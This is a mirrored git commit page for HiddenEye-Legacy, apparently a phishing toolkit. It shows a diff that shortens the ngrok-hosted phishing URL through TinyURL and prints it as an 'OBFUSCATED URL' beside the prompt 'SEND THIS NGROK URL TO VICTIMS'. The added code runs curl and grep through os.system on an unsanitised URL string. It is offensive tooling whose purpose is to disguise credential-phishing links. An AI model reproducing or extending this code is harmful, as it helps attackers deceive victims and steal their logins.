mirror of
https://github.com/DarkSecDevelopers/HiddenEye-Legacy.git
synced 2024-03-22 21:12:55 +08:00
Merge pull request #404 from DarkSecDevelopers/An0nUD4Y-patch-1
Added Tinyurl ! (Only For NGROK )
This commit is contained in:
commit
4d1f303e0e
|
@ -173,9 +173,15 @@ def selectServer(port): #Question where user must select server
|
|||
urlFile = open('ngrok.url', 'r')
|
||||
url = urlFile.read()
|
||||
urlFile.close()
|
||||
system("curl -o tinyurlsource.txt -s 'http://tinyurl.com/create.php?url='"+url)
|
||||
system("""grep success -F tinyurlsource.txt | cut -d'"' -f6 > tinyurl.txt """)
|
||||
urlFile = open('tinyurl.txt', 'r')
|
||||
tinyurl = urlFile.read()
|
||||
urlFile.close()
|
||||
if re.match("https://[0-9a-z]*\.ngrok.io", url) != None:
|
||||
print(_("\n{0}[{1}!{0}]{1} SEND THIS NGROK URL TO VICTIMS-\n{0}[{1}*{0}]{1} Localhost URL: {2}http://127.0.0.1:{3}\n{0}[{1}*{0}]{1} NGROK URL: {2}".format(MAIN0, MAIN2, MAIN3, port) + url + "{1}").format(MAIN0, MAIN4, MAIN3))
|
||||
print("\n")
|
||||
print("{0}[{1}*{0}]{1} OBFUSCATED URL: {2}".format(MAIN0, MAIN2, MAIN3, port) + tinyurl + "{1}".format(MAIN0, MAIN4, MAIN3))
|
||||
print("\n")
|
||||
break
|
||||
|
||||
elif choice == '2':
|
||||
|
|
Loading…
Reference in New Issue
Block a user